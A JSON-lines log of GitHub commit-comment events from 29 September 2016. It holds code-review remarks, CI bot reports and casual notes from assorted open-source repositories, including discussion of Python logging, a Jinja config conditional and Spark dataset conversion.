{"id":"4635046171","type":"CommitCommentEvent","actor":{"login":"pritesh"},"repo":{"name":"romana/romana"},"payload":{"comment":{"id":19218847,"position":5,"line":94,"path":"romana-install/roles/romana/install-master/templates/config/romana.conf.yml","commit_id":"70c5b50557ea70654717f337451bbc197ac0a5d1","created_at":"2016-09-29T04:54:49Z","updated_at":"2016-09-29T04:54:49Z","body":"not sure about it, but simple fix would be:\r\n\r\n{% if romana_segment_label_name  is defined %}\r\nL85   - service: kubernetesListener\r\nsnip ..\r\nL94      segment_label_name: \"{{ romana_segment_label_name }}\"\r\n{% endif %}"}},"created_at":"2016-09-29T04:54:49Z"}
{"id":"4635048325","type":"CommitCommentEvent","actor":{"login":"pizzaisdavid"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19218849,"position":null,"line":null,"path":null,"commit_id":"0eb77e61d2e9a778c08e696d503a85e3e79ee155","created_at":"2016-09-29T04:55:41Z","updated_at":"2016-09-29T04:55:41Z","body":"I think I understand you, and I couldn't find anything on Google about instance level logging in Python, so I made this up,\r\n\r\n  `self.logger = logging.getLogger(__class__.__name__ + ' ' + str(hex(id(self)))))`\r\n \r\nIt prints the class name and the memory address of the object at initialization.\r\n\r\n[Here is a picture of it in action.](http://i.imgur.com/F631DnV.png)\r\n\r\n"}},"created_at":"2016-09-29T04:55:41Z"}
{"id":"4635048996","type":"CommitCommentEvent","actor":{"login":"aharjula"},"repo":{"name":"maths/moodle-qtype_stack"},"payload":{"comment":{"id":19218854,"position":52,"line":52,"path":"stack/answertest/digits.php","commit_id":"0289e386f28f07bb857a7ee6c61516ab531914ec","created_at":"2016-09-29T04:55:59Z","updated_at":"2016-09-29T04:55:59Z","body":"It is entirely possible that we need to change this to `max($leadingzeros-1,1)`, but we should find out how to interpret pure zero values with trailing zeros before that.  Maybe someone from the physics side knows what the correct way is? Anyway it is not mentioned in [Wikipedia](https://en.wikipedia.org/wiki/Significant_figures) and I have not looked at anything more serious yet.\r\n\r\nThe reason we have that upper bound at all for zero is due to possible randomisation issues in questions producing cases where the answer becomes zero while the required number of significant digits stays the same, in that case we might need to have a way of inputting the zero at such an number of digits...\r\n\r\nActually some definitions of significant digits would say that for zero there are zero significant digits, but that randomisation case I thought off surely makes that problematic."}},"created_at":"2016-09-29T04:55:59Z"}
{"id":"4635049174","type":"CommitCommentEvent","actor":{"login":"DustyGreen64"},"repo":{"name":"CS3398-Cobalt-Salutations/Group_Scratch"},"payload":{"comment":{"id":19218855,"position":null,"line":null,"path":null,"commit_id":"241c109614a23d47f5923e63a8ba8f067672d01d","created_at":"2016-09-29T04:56:04Z","updated_at":"2016-09-29T04:56:04Z","body":"Okay I messed up that commit somehow. "}},"created_at":"2016-09-29T04:56:04Z"}
{"id":"4635049896","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":19218858,"position":null,"line":null,"path":null,"commit_id":"8753bf80b9a13feb1a4ec530a7f34c808f9277d1","created_at":"2016-09-29T04:56:20Z","updated_at":"2016-09-29T04:56:20Z","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/tools/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2016-09-29T04:56:20Z"}
{"id":"4635049906","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":19218859,"position":null,"line":null,"path":null,"commit_id":"ae7d99046932bb38b1acea27b800adec8a52a332","created_at":"2016-09-29T04:56:20Z","updated_at":"2016-09-29T04:56:20Z","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/tools/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2016-09-29T04:56:20Z"}
{"id":"4635050495","type":"CommitCommentEvent","actor":{"login":"Herrie82"},"repo":{"name":"webOS-ports/luna-sysmgr"},"payload":{"comment":{"id":19218863,"position":null,"line":null,"path":null,"commit_id":"744631a0bff9f58e7280a261a5297acfd13b9897","created_at":"2016-09-29T04:56:37Z","updated_at":"2016-09-29T04:56:37Z","body":"@DougReeder How about Testr?"}},"created_at":"2016-09-29T04:56:37Z"}
{"id":"4635054902","type":"CommitCommentEvent","actor":{"login":"dsuare1"},"repo":{"name":"dsuare1/the_round_about"},"payload":{"comment":{"id":19218869,"position":null,"line":null,"path":null,"commit_id":"8bd3fce3c80d8db9335a6c7e55f7ab1eabe6e055","created_at":"2016-09-29T04:58:21Z","updated_at":"2016-09-29T04:58:21Z","body":"-added 're-add' functionality in delete route\r\n-started Javascript front-end file for api-form validation"}},"created_at":"2016-09-29T04:58:21Z"}
{"id":"4635056011","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19218872,"position":null,"line":null,"path":null,"commit_id":"8bfd1d6afd3428159a0176fd3e91fc82f0624c9e","created_at":"2016-09-29T04:58:46Z","updated_at":"2016-09-29T04:58:46Z","body":"@SkyFire , promoted https://github.com/JadeEmu/JadeCore_547/invitations"}},"created_at":"2016-09-29T04:58:46Z"}
{"id":"4635057468","type":"CommitCommentEvent","actor":{"login":"chautruongthinh"},"repo":{"name":"chautruongthinh/android_frameworks_av"},"payload":{"comment":{"id":19218874,"position":null,"line":null,"path":null,"commit_id":"1b8a0f9d93f8ec588bc03291bed4d2fb579f5fae","created_at":"2016-09-29T04:59:22Z","updated_at":"2016-09-29T04:59:22Z","body":"Many Thanks @Ordenkrieger "}},"created_at":"2016-09-29T04:59:22Z"}
{"id":"4635057610","type":"CommitCommentEvent","actor":{"login":"josisusan"},"repo":{"name":"josisusan/codefactor_trial"},"payload":{"comment":{"id":19218875,"position":null,"line":null,"path":null,"commit_id":"561a4882b7bccfd4b3be219eb39bf89d9f6f7a94","created_at":"2016-09-29T04:59:25Z","updated_at":"2016-09-29T04:59:25Z","body":"[CodeFactor](https://www.codefactor.io/repository/github/josisusan/codefactor_trial/overview/new_branch) found an issue: Duplicate Code\n\nIt's currently on:\n[app\\models\\hello.rb](https://www.codefactor.io/repository/github/josisusan/codefactor_trial/files/new_branch/app/models/hello.rb):[6-17](https://www.codefactor.io/repository/github/josisusan/codefactor_trial/files/source/new_branch/app/models/hello.rb#L6)\n[app\\models\\hello.rb](https://www.codefactor.io/repository/github/josisusan/codefactor_trial/files/new_branch/app/models/hello.rb):[26-37](https://www.codefactor.io/repository/github/josisusan/codefactor_trial/files/source/new_branch/app/models/hello.rb#L26)\nCommit 561a4882b7bccfd4b3be219eb39bf89d9f6f7a94"}},"created_at":"2016-09-29T04:59:25Z"}
{"id":"4635058702","type":"CommitCommentEvent","actor":{"login":"gappleto97"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19218878,"position":null,"line":null,"path":null,"commit_id":"0eb77e61d2e9a778c08e696d503a85e3e79ee155","created_at":"2016-09-29T04:59:51Z","updated_at":"2016-09-29T04:59:51Z","body":"Probably you could just use the ID it already generates. So:\r\n\r\n```python\r\n\r\nclass BaseSocket(object):\r\n    def __init__(...):\r\n        self.id = ...\r\n        self.logger = logging.getLogger(__class__.__name__ + ' ' + self.id)\r\n\r\nclass BaseConnection(object):\r\n    @property\r\n    def logger(self):\r\n        return self.server.logger\r\n\r\nclass BaseDaemon(object):\r\n    @property\r\n    def logger(self):\r\n        return self.server.logger\r\n```"}},"created_at":"2016-09-29T04:59:51Z"}
{"id":"4635060640","type":"CommitCommentEvent","actor":{"login":"gappleto97"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19218883,"position":null,"line":null,"path":null,"commit_id":"0eb77e61d2e9a778c08e696d503a85e3e79ee155","created_at":"2016-09-29T05:00:33Z","updated_at":"2016-09-29T05:00:33Z","body":"Otherwise that looked good to me.\r\n\r\nI'm just trying to make sure that related log items are immediately obvious."}},"created_at":"2016-09-29T05:00:33Z"}
{"id":"4635063100","type":"CommitCommentEvent","actor":{"login":"gappleto97"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19218887,"position":null,"line":null,"path":null,"commit_id":"0eb77e61d2e9a778c08e696d503a85e3e79ee155","created_at":"2016-09-29T05:01:33Z","updated_at":"2016-09-29T05:01:33Z","body":"Or for the other ones it could be\r\n\r\n```python\r\nclass BaseDaemon(object):\r\n    def __init__(...):\r\n        ...\r\n        self.logger = logging.getLogger(__class__.__name__ + ' ' + self.server.id)\r\n```\r\n\r\nThat one is probably better actually."}},"created_at":"2016-09-29T05:01:33Z"}
{"id":"4635070330","type":"CommitCommentEvent","actor":{"login":"Naghedi"},"repo":{"name":"Naghedi/hello-world"},"payload":{"comment":{"id":19218905,"position":null,"line":null,"path":null,"commit_id":"1305e11509fc48cc460b22e43e0606512715787d","created_at":"2016-09-29T05:04:23Z","updated_at":"2016-09-29T05:04:23Z","body":"hello"}},"created_at":"2016-09-29T05:04:23Z"}
{"id":"4635072145","type":"CommitCommentEvent","actor":{"login":"caoruiy"},"repo":{"name":"caoruiy/selenium-python-docs-zh"},"payload":{"comment":{"id":19218908,"position":null,"line":null,"path":null,"commit_id":"534195d7ad905ad14c07b12820142cfb076e6a0a","created_at":"2016-09-29T05:05:04Z","updated_at":"2016-09-29T05:05:04Z","body":"page-objects"}},"created_at":"2016-09-29T05:05:04Z"}
{"id":"4635074603","type":"CommitCommentEvent","actor":{"login":"gappleto97"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19218916,"position":null,"line":null,"path":null,"commit_id":"ce07ac97d4191c9bbf0e31055e2ceb95e656de27","created_at":"2016-09-29T05:06:04Z","updated_at":"2016-09-29T05:06:04Z","body":"I feel like that object should be defined in the testing area, or something.\r\n\r\nI feel like there ought to be a better solution to this than making an object out of a method. Are you sure we couldn't pass in the function itself, since those are also objects?"}},"created_at":"2016-09-29T05:06:04Z"}
{"id":"4635075785","type":"CommitCommentEvent","actor":{"login":"joakimk"},"repo":{"name":"jcelliott/toniq"},"payload":{"comment":{"id":19218919,"position":null,"line":null,"path":null,"commit_id":"b32df755896203d8ee6e930c17505e4e10950389","created_at":"2016-09-29T05:06:30Z","updated_at":"2016-09-29T05:06:30Z","body":"With \"this kind of thing\", do you mean Toniq in general? I think it should support 100k+ jobs if it can do so without becoming too complex.\r\n\r\nThe thing I've strived to avoid is multiple BEAM's fighting over the same job lists, having to use locking and such. As long as we can avoid complexity like that, I'm open to most changes.\r\n\r\nThen again, if you have 100k things that need doing and you can reproduce that list, you could just make some kind of GenServer setup yourself to process them."}},"created_at":"2016-09-29T05:06:30Z"}
{"id":"4635076858","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19218924,"position":null,"line":null,"path":null,"commit_id":"1d92e338c264c5af0734a4dc4c121be9a086ef2a","created_at":"2016-09-29T05:06:57Z","updated_at":"2016-09-29T05:06:57Z","body":"EMS (brianlball) - Win64-Windows-7-VisualStudio-12: OK (2307 of 2497 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-1d92e338c264c5af0734a4dc4c121be9a086ef2a-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-1d92e338c264c5af0734a4dc4c121be9a086ef2a-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.39%25-yellow.svg)</a> \n"}},"created_at":"2016-09-29T05:06:57Z"}
{"id":"4635076986","type":"CommitCommentEvent","actor":{"login":"ldunca-sfp"},"repo":{"name":"SFPTrainings/js-unit-tests"},"payload":{"comment":{"id":19218926,"position":5,"line":49,"path":"karma.conf.js","commit_id":"81af0e4fbbb6289e3966c34069a11c903f9382ab","created_at":"2016-09-29T05:07:01Z","updated_at":"2016-09-29T05:07:01Z","body":"mandru :D"}},"created_at":"2016-09-29T05:07:01Z"}
{"id":"4635082972","type":"CommitCommentEvent","actor":{"login":"mzweben"},"repo":{"name":"splicemachine/spliceengine"},"payload":{"comment":{"id":19218941,"position":null,"line":null,"path":null,"commit_id":"e9b1cd7b73d6df7bcdde0a5534f4e54c9c0b8eca","created_at":"2016-09-29T05:09:28Z","updated_at":"2016-09-29T05:09:28Z","body":"+1\r\nMight be nice to create a helper method to abstract away this conversion...maybe implement toSplice and toSpark methods?\r\n//Convert this rdd backed iterator to a Spark untyped dataset\r\n +            Dataset<Row> that = SpliceSpark.getSession()\r\n +                    .createDataFrame(\r\n +                        rdd.map(\r\n +                            new LocatedRowToRowFunction()),\r\n +                        context.getOperation()\r\n +                               .getExecRowDefinition()\r\n +                               .schema());\r\n +"}},"created_at":"2016-09-29T05:09:28Z"}
{"id":"4635083244","type":"CommitCommentEvent","actor":{"login":"hoangloc0402"},"repo":{"name":"hoangloc0402/ksbdgk65143tsbda324r2387"},"payload":{"comment":{"id":19218944,"position":null,"line":null,"path":null,"commit_id":"1e76dba9f5865f13fc2c09d86eb84410e5f8a7f8","created_at":"2016-09-29T05:09:34Z","updated_at":"2016-09-29T05:09:34Z","body":"éc éc écccccccccccccc"}},"created_at":"2016-09-29T05:09:34Z"}
{"id":"4635084684","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19218948,"position":null,"line":null,"path":null,"commit_id":"a8ba8a796f02929fc32e477fe9002522bd8994ed","created_at":"2016-09-29T05:10:10Z","updated_at":"2016-09-29T05:10:10Z","body":"MakeWebKitWork (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a8ba8a796f02929fc32e477fe9002522bd8994ed-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a8ba8a796f02929fc32e477fe9002522bd8994ed-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-29T05:10:10Z"}
{"id":"4635088050","type":"CommitCommentEvent","actor":{"login":"jilen"},"repo":{"name":"mauricio/postgresql-async"},"payload":{"comment":{"id":19218958,"position":4,"line":69,"path":"mysql-async/src/main/scala/com/github/mauricio/async/db/mysql/codec/LittleEndianByteBufAllocator.scala","commit_id":"07dadc804041c2564ce386e535047da9e8b0a8ae","created_at":"2016-09-29T05:11:32Z","updated_at":"2016-09-29T05:11:32Z","body":"What's the purpose of this method ?"}},"created_at":"2016-09-29T05:11:32Z"}
{"id":"4635088348","type":"CommitCommentEvent","actor":{"login":"xavier-rdo"},"repo":{"name":"manala/manala"},"payload":{"comment":{"id":19218960,"position":23,"line":40,"path":"src/Config/Requirement/Violation/RequirementViolationLabelBuilder.php","commit_id":"fb1d1e27d26593dfcd4c323c9e4675e7764a7ba8","created_at":"2016-09-29T05:11:40Z","updated_at":"2016-09-29T05:11:40Z","body":"I don't like this ;) It makes the label builder aware of its context (we know that an help may be appended but in my opinion, it should not be the responsibility of this class ; the consumer should be responsible for this). What do you think about it ?"}},"created_at":"2016-09-29T05:11:40Z"}
{"id":"4635089788","type":"CommitCommentEvent","actor":{"login":"mzweben"},"repo":{"name":"splicemachine/spliceengine"},"payload":{"comment":{"id":19218965,"position":null,"line":null,"path":null,"commit_id":"e9b1cd7b73d6df7bcdde0a5534f4e54c9c0b8eca","created_at":"2016-09-29T05:12:12Z","updated_at":"2016-09-29T05:12:12Z","body":"+1 Might be nice to implement helper methods like toSplice and toSpark to abstract implemenation details in \r\n`//Convert this rdd backed iterator to a Spark untyped dataset\r\n +            Dataset<Row> that = SpliceSpark.getSession()\r\n +                    .createDataFrame(\r\n +                        rdd.map(\r\n +                            new LocatedRowToRowFunction()),\r\n +                        context.getOperation()\r\n +                               .getExecRowDefinition()\r\n +                               .schema());\r\n +`"}},"created_at":"2016-09-29T05:12:12Z"}
{"id":"4635090841","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19218969,"position":null,"line":null,"path":null,"commit_id":"a8ba8a796f02929fc32e477fe9002522bd8994ed","created_at":"2016-09-29T05:12:41Z","updated_at":"2016-09-29T05:12:41Z","body":"MakeWebKitWork (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a8ba8a796f02929fc32e477fe9002522bd8994ed-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a8ba8a796f02929fc32e477fe9002522bd8994ed-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-29T05:12:41Z"}
{"id":"4635094712","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19218978,"position":null,"line":null,"path":null,"commit_id":"54f3c9091fe081943846552a3ee0d33dbc755655","created_at":"2016-09-29T05:14:26Z","updated_at":"2016-09-29T05:14:26Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/54f3c9091fe081943846552a3ee0d33dbc755655#commitcomment-19218527) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/2e73fb8ca6bba385c2cdb52ce7debae65f1bf012/daily_2016_9_29/report.md). cc @jrevels"}},"created_at":"2016-09-29T05:14:26Z"}
{"id":"4635097909","type":"CommitCommentEvent","actor":{"login":"olmobrutall"},"repo":{"name":"signumsoftware/extensions"},"payload":{"comment":{"id":19218988,"position":null,"line":null,"path":null,"commit_id":"49f66a712e4d9c44e6d736d19f617f0240e4d31b","created_at":"2016-09-29T05:15:45Z","updated_at":"2016-09-29T05:15:45Z","body":"Ok now I get it, but there are two issues: \r\n\r\nWhy the user doesn't set a higher priority to his dashboard? By adding this rule we are making impossible to use a departamento-whose dashboard as default for me.\r\n\r\nIn case there is a good reason, we just need to add `OrderByDescending(d=>d.Owener.RefersTo(UserEntity.Current).ThenBy(d=> d.Priority)` without duplicating the whole thing"}},"created_at":"2016-09-29T05:15:45Z"}
{"id":"4635102337","type":"CommitCommentEvent","actor":{"login":"chb1569"},"repo":{"name":"chb1569/dkcoin-2016"},"payload":{"comment":{"id":19218992,"position":null,"line":null,"path":null,"commit_id":"6069c264b5dd644c6a93c71cf86928b373f8cace","created_at":"2016-09-29T05:17:35Z","updated_at":"2016-09-29T05:17:35Z","body":"This is QiuhongBo create dkcoin.md 微信abo7788"}},"created_at":"2016-09-29T05:17:35Z"}
{"id":"4635104451","type":"CommitCommentEvent","actor":{"login":"xavier-rdo"},"repo":{"name":"manala/manala"},"payload":{"comment":{"id":19218994,"position":null,"line":null,"path":null,"commit_id":"fb1d1e27d26593dfcd4c323c9e4675e7764a7ba8","created_at":"2016-09-29T05:18:29Z","updated_at":"2016-09-29T05:18:29Z","body":"You could publish a merge request pointing to my branch. Keeping track of your commit in the history does make sense to me as you propose a coherent global improvement."}},"created_at":"2016-09-29T05:18:29Z"}
{"id":"4635105527","type":"CommitCommentEvent","actor":{"login":"digitalcircuit"},"repo":{"name":"quassel/quassel"},"payload":{"comment":{"id":19218997,"position":49,"line":970,"path":"src/core/corenetwork.cpp","commit_id":"d017fec4290f7585427f78371e7851487b9dc2eb","created_at":"2016-09-29T05:18:55Z","updated_at":"2016-09-29T05:18:55Z","body":"Ack, I made a typo here.  This comment should say...\r\n```cpp\r\n// _skipMessageRates = ((useCustomMessageRate && unlimitedMessageRate) || forceUnlimited)\r\n```\r\nAs in, ```forceUnlimited``` will apply even if custom rate limits aren't enabled (*necessary to avoid ping timeouts during login with default Quassel settings*).  Just making a comment for future reference; will try to fix in a future pull request :)"}},"created_at":"2016-09-29T05:18:55Z"}
{"id":"4635106146","type":"CommitCommentEvent","actor":{"login":"srashmi032"},"repo":{"name":"srashmi032/khaleesi"},"payload":{"comment":{"id":19219000,"position":null,"line":null,"path":null,"commit_id":"02abe1b3ffd512df35d4a9ae24917db8bafdd3d6","created_at":"2016-09-29T05:19:13Z","updated_at":"2016-09-29T05:19:13Z","body":"I have to find no. Of distinct numbers in array,but my code is not running for every case. What is wrong in my code?please help"}},"created_at":"2016-09-29T05:19:13Z"}
{"id":"4635106959","type":"CommitCommentEvent","actor":{"login":"jwvg0425"},"repo":{"name":"pjc0247/unifiler"},"payload":{"comment":{"id":19219002,"position":null,"line":null,"path":null,"commit_id":"f453331c5aef3655a15ef292f6d0ecdc6ed0d29b","created_at":"2016-09-29T05:19:34Z","updated_at":"2016-09-29T05:19:34Z","body":"god.."}},"created_at":"2016-09-29T05:19:34Z"}
{"id":"4635108278","type":"CommitCommentEvent","actor":{"login":"ABOLFAZLaaaa"},"repo":{"name":"ABOLFAZLaaaa/tele-plus"},"payload":{"comment":{"id":19219005,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-29T05:20:07Z","updated_at":"2016-09-29T05:20:07Z","body":"204796071"}},"created_at":"2016-09-29T05:20:07Z"}
{"id":"4635108775","type":"CommitCommentEvent","actor":{"login":"fwolf"},"repo":{"name":"jerrybendy/phpstorm-webstorm-skills"},"payload":{"comment":{"id":19219007,"position":40,"line":24,"path":"docs/002.keyboard-shortcuts-you-cannot-miss.md","commit_id":"0df6b7a14aea310a71efabcc6ad7d660c27412f0","created_at":"2016-09-29T05:20:20Z","updated_at":"2016-09-29T05:20:20Z","body":"MWeb 在 Mac App Store 上售价 68 元……我还是盲写好了\r\n\r\n我主要是吐槽空格和中文字体和字母不等宽，所以表格没法手工对齐。"}},"created_at":"2016-09-29T05:20:20Z"}
{"id":"4635109336","type":"CommitCommentEvent","actor":{"login":"ABOLFAZLaaaa"},"repo":{"name":"ABOLFAZLaaaa/tele-plus"},"payload":{"comment":{"id":19219010,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-29T05:20:36Z","updated_at":"2016-09-29T05:20:36Z","body":"204796071"}},"created_at":"2016-09-29T05:20:36Z"}
{"id":"4635112188","type":"CommitCommentEvent","actor":{"login":"pjc0247"},"repo":{"name":"pjc0247/unifiler"},"payload":{"comment":{"id":19219014,"position":null,"line":null,"path":null,"commit_id":"f453331c5aef3655a15ef292f6d0ecdc6ed0d29b","created_at":"2016-09-29T05:21:48Z","updated_at":"2016-09-29T05:21:48Z","body":"현욱아 이런댓글 달시간에 연휴 이용해서 넥커톤이나 주최하렴"}},"created_at":"2016-09-29T05:21:48Z"}
{"id":"4635113627","type":"CommitCommentEvent","actor":{"login":"sichengLv"},"repo":{"name":"sichengLv/Hello-World"},"payload":{"comment":{"id":19219016,"position":null,"line":null,"path":null,"commit_id":"216f2f960bf96716b4821c7eeba7d7562060aedb","created_at":"2016-09-29T05:22:23Z","updated_at":"2016-09-29T05:22:23Z","body":"add some changes in readme"}},"created_at":"2016-09-29T05:22:23Z"}
{"id":"4635114131","type":"CommitCommentEvent","actor":{"login":"cmoulliard"},"repo":{"name":"arquillian/arquillian-cube"},"payload":{"comment":{"id":19219018,"position":null,"line":null,"path":null,"commit_id":"e1c3b60bdfed9ea32d56e4abec6d2141b06980af","created_at":"2016-09-29T05:22:37Z","updated_at":"2016-09-29T05:22:37Z","body":"I suggest to rephrase to `Arquillian Cube Kubernetes needs to be authenticated against Kubernetes. to do it, Cube will read from `~/.kube/config` the user information (token, password)`\r\n\r\nRemark :\r\n- Concerning the OpenShift login example, we should perhaps mention that if the user is well authenticated, than OpenShift will communicate with Kubernetes to update the ~/.kube/config file with the info provided. \r\n- A link to the openshift or kubernetes doc could also be interesting to check info (\"http://kubernetes.io/docs/user-guide/kubectl/kubectl_config/\")"}},"created_at":"2016-09-29T05:22:37Z"}
{"id":"4635114611","type":"CommitCommentEvent","actor":{"login":"balamyt92"},"repo":{"name":"balamyt92/InfoDesk"},"payload":{"comment":{"id":19219019,"position":null,"line":null,"path":null,"commit_id":"abfcc5f2e0494a5730f465093b29abedeeebeed3","created_at":"2016-09-29T05:22:48Z","updated_at":"2016-09-29T05:22:48Z","body":"#35 close"}},"created_at":"2016-09-29T05:22:48Z"}
{"id":"4635114719","type":"CommitCommentEvent","actor":{"login":"medz"},"repo":{"name":"medz/thinksns"},"payload":{"comment":{"id":19219022,"position":null,"line":null,"path":null,"commit_id":"693223d41bbda540362be9e22225f04f299acc8c","created_at":"2016-09-29T05:22:51Z","updated_at":"2016-09-29T05:22:51Z","body":"fix #78 删除w3g，暂时保留程序文件。"}},"created_at":"2016-09-29T05:22:51Z"}
{"id":"4635115519","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"7yon/C_SharpCourse"},"payload":{"comment":{"id":19219025,"position":null,"line":null,"path":null,"commit_id":"0cbaadb0ec6e513f090198aa1b03630de0a72cc1","created_at":"2016-09-29T05:23:13Z","updated_at":"2016-09-29T05:23:13Z","body":"Чего-то я не понял, что этот тест проверяет. Что метод вызывается без ошибок?"}},"created_at":"2016-09-29T05:23:13Z"}
{"id":"4635121082","type":"CommitCommentEvent","actor":{"login":"ondevops"},"repo":{"name":"ondevops/payalpatel"},"payload":{"comment":{"id":19219042,"position":null,"line":null,"path":null,"commit_id":"a8919f4df2e0cb510f00c5e2196da47046d7de29","created_at":"2016-09-29T05:25:40Z","updated_at":"2016-09-29T05:25:40Z","body":"can you please add some more files here. This is the actual scenario in the work. You committed something but as a reviewer I want some changes in your commit so again you need to update that and then commit again. \r\nThis is the best practice that we need to follow. \r\nAny way Nice work."}},"created_at":"2016-09-29T05:25:40Z"}
{"id":"4635122246","type":"CommitCommentEvent","actor":{"login":"ondevops"},"repo":{"name":"ondevops/saithejakadiyala"},"payload":{"comment":{"id":19219046,"position":null,"line":null,"path":null,"commit_id":"8bbe1f951dd9acf61702b563e3a170808459bde9","created_at":"2016-09-29T05:26:10Z","updated_at":"2016-09-29T05:26:10Z","body":"can you please add some more files here. This is the actual scenario in the work. You committed something but as a reviewer I want some changes in your commit so again you need to update that and then commit again. \r\nThis is the best practice that we need to follow. \r\nAny way Nice work."}},"created_at":"2016-09-29T05:26:10Z"}
{"id":"4635122933","type":"CommitCommentEvent","actor":{"login":"Hotell"},"repo":{"name":"vire/hlad-ui"},"payload":{"comment":{"id":19219047,"position":17,"line":18,"path":"tsconfig.json","commit_id":"92fd78c2ce78c52171706ceb70e90bf59474812f","created_at":"2016-09-29T05:26:26Z","updated_at":"2016-09-29T05:26:26Z","body":"What is this?"}},"created_at":"2016-09-29T05:26:26Z"}
{"id":"4635123905","type":"CommitCommentEvent","actor":{"login":"hthetiot"},"repo":{"name":"priologic/easyrtc"},"payload":{"comment":{"id":19219049,"position":null,"line":null,"path":null,"commit_id":"9c0282ab84fd88182cc02de510132ed9ca461a65","created_at":"2016-09-29T05:26:50Z","updated_at":"2016-09-29T05:26:50Z","body":"@EricDavies result of \"grunt jshint\"\r\n\r\nAlso to run demo after 'npm install' into 'server_example' use 'grunt serve'"}},"created_at":"2016-09-29T05:26:50Z"}
{"id":"4635125884","type":"CommitCommentEvent","actor":{"login":"Expecto"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19219052,"position":4,"line":4,"path":"sql/updates/world/3.3.5/2016_09_28_00_world.sql","commit_id":"b153d783b9532c9a8c48312410f62df5ddd9f583","created_at":"2016-09-29T05:27:39Z","updated_at":"2016-09-29T05:27:39Z","body":"http://www.wowhead.com/npc=24254/dragonflayer-prisoner#abilities"}},"created_at":"2016-09-29T05:27:39Z"}
{"id":"4635126466","type":"CommitCommentEvent","actor":{"login":"Expecto"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19219053,"position":3,"line":3,"path":"sql/updates/world/3.3.5/2016_09_28_00_world.sql","commit_id":"b153d783b9532c9a8c48312410f62df5ddd9f583","created_at":"2016-09-29T05:27:53Z","updated_at":"2016-09-29T05:27:53Z","body":"http://www.wowhead.com/npc=24254/dragonflayer-prisoner#abilities"}},"created_at":"2016-09-29T05:27:53Z"}
